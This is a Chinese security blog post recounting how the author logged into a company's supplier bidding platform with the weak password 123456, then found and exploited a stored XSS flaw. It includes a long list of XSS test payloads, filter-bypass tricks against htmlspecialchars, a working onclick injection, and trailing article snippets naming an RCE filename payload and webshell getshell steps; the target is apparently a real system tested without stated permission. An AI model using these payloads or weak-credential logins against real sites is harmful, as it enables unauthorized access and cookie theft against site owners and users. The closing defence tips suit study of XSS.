对某公司一次弱口令到存储型xss挖掘

VSole2021-11-22 14:45:46

背景:

某次针对某目标信息搜集无意发现某工程公司的项目招标平台

厚码…求生欲满满呜呜呜

有个供应商登陆,啥也不说先来个弱口令 123456:123456

只能说弱口令yyds!!!!

发现在供应商资料中存在不少输入点,手痒随手一波xss

分享一波常用测试语句:

输入框:

<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>

图片:

<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x οnerrοr=alert("XSS");>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

编辑器:

[a](javascript:window.onerror=alert;throw%201)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](j a v a s c r i p t:prompt(document.cookie))
[a](javascript:prompt(document.cookie))

刷一波发现大部分都有过滤,但是[股份/责任人] 栏下有代码被注入成功

语句为:"<script>alert('XSS')</script>"<\

查看该部分DOM源码:

有戏!

针对该点继续测试,构造语句:"<script>alert('XSS')</script>"<

尝试url编码:

这么一通注下来,对刚刚的乱注小总结一下:

  • 发现 / 被转义成 =”” //
  • /变成 =””
  • </ script>转义成<=”” script=””> 而且多个/
  • 如///也只被转义成 =”” 没办法重写绕过

并且存在htmlspecialchars()函数: &quot,意味: “””

本地测试发现script便签中存在 &quot 就无法弹窗

所以存在两个问题,一方面要绕过这个&quot,而且要绕过的转义

先说对的绕过思路:

转换法:

前端限制绕过,直接抓包重放,或者修改html前端代码
大小写,比如:<scrIPT>alERT(1111)</scRIPT>用来绕过
拼凑:<scri<script>pt>alert(1111)</scri</script>pt>
使用注释干扰:
<scri<!--test-->pt>alert(111)</scri<!--test-->pt>
编码法:核心思路:后台过滤了特殊字符,比如<script>标签,但该标签可以被各种编码,后台不一定过滤,当浏览器对该编码进行识别时,会翻译成正常的便签,从而执行在使用编码时需要主要编码在输出点是否会被正常是不和翻译!

接下来说对&quot的绕过:

`htmlspecialchars()函数是把预定义的字符转换为HTML实体,预定义的字符是:

&(和号)成为 &amp

“ (双引号)成为&quot

‘(单引号)成为&#039

<(小于号)成为&lt

(大于号) 成为&gt
可引用类型:
ENT_COMPAT-默认,仅编码双引号
ENT_QUOMES-编码双引号和单引号
ENT_NOQUOTES-不编码任何引号
`

其他函数

构造语句:

构造对&quot的绕过:

q'οnclick='alert(1111)'

直接产生弹窗:

重新访问页面该xss弹窗还在,说明注入成功

接下来就是利用xss平台对这个注入点进行下一步利用

具体可以参考:

https://www.cnblogs.com/coderge/p/13701664.html

xss常见的防范措施

总的原则:输入做过滤,输出做转义

过滤:根据业务需求进行过滤,比如过滤要求输入手机号,则只允许输入手机号格式的数字

xss弱口令
本作品采用《CC 协议》,转载必须注明作者和本文链接
0x01 前言最近两个月学着去挖洞,混了快2个月的补天,还是有挺多收获的。我们先注册一个个人用户,然后登陆。然后到这里,不要以为失败了,我们还是得对这个页面抓包,继续改usertype和uid,然后再次发包就可以下载了。但是这个报错让我知道了完整的sql语句于是想到了用万能密码。注入的地方在搜索框,是一个搜索型SQL注入,通常搜索型SQL注入的SQL语句都是:select * from users where id like '%xxx%' order by xxxxxxxxx";
接口未授权在尝是了一波js接口后没有发现什么漏洞,但是查找到了一些信息泄露。sql注入(两枚)在刚刚注册了用户,登录进去。第一处将url和参数进行拼接。第二处第二处同样是js文件内找到。在图片中间的地方插入xss语句但是如果没有找到可以注册的api,则这个漏洞无法利用,为了扩大漏洞危害,尝试删除cookie,是否可以未授权文件上传。
求生欲满满呜呜呜有个供应商登陆,啥也不说先来个口令 123456:123456只能说口令yyds!!!!发现在供应商资料中存在不少输入点,手痒随手一波xss分享一波常用测试语句:输入框:
信安之路文库第?通过列出的目录发现, image 目录下存在一个压缩文件:?????下载后,解压:?????其中提到一个修改 logo 的接口,使用 burp 请求,发现接口存在并且可以访问:?????尝试使用浏览器访问:?????可以上传文件,那么尝试看看能否直接上传个 webshell,经过多次尝试后以失败而告终,最后测试看看文件名处是不是有一些常见的漏洞,比如 SQL 注入,XSS、RCE 等,功夫不负有心人,终于让我发现了一个 RCE:payload 为:filename=”test||sleep 30 ||.gif”
前言 分享两个小思路,很久以前玩的,列如我们在生活中会遇到各种烦人的短信轰炸,怎么样子去反制他?
针对 Acunetix AWVS扫描器开发的批量扫描脚本,支持log4j漏洞、SpringShell、SQL注入、XSS口令等专项,支持联动xray、burp、w13scan等被动批量
前言记录下某个测试项目中,通过一个文件备份泄露到主机上线的过程。习惯性将路径拼接一下访问一下url,好家伙,未授权。默认账户密码同时注意到了配置文件中还有一行定义了默认登录账户和密码哈希。于是在cmd5对此哈希进行解密,并成功获取账号明文密码。使用正确的url通过哥斯拉连接成功,GetShell达成。未授权访问+数据查询+xp_cmdshell=RCE在getshell之后,并未停止测试脚步,发现了一处sql查询页面,除了可以查询数据库内容外,还可以执行sql语句。
服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化搜索,pdf文件,中间件版本,口令扫描等 扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感文件泄漏等 传输协议,通用漏洞,ex
只要功夫深,铁杵磨成针!
Scanners-Box 指引#简介#Scanners-Box是一个集合github平台上的安全行业从业人员自研开源扫描器的仓库,包括子域名枚举、数据库漏洞扫描、口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描器或模块化扫描器;该仓库只收录各位网友自己编写的一般性开源扫描器,类似nmap、w3af、brakeman等知名扫描工具不收录。
VSole
网络安全专家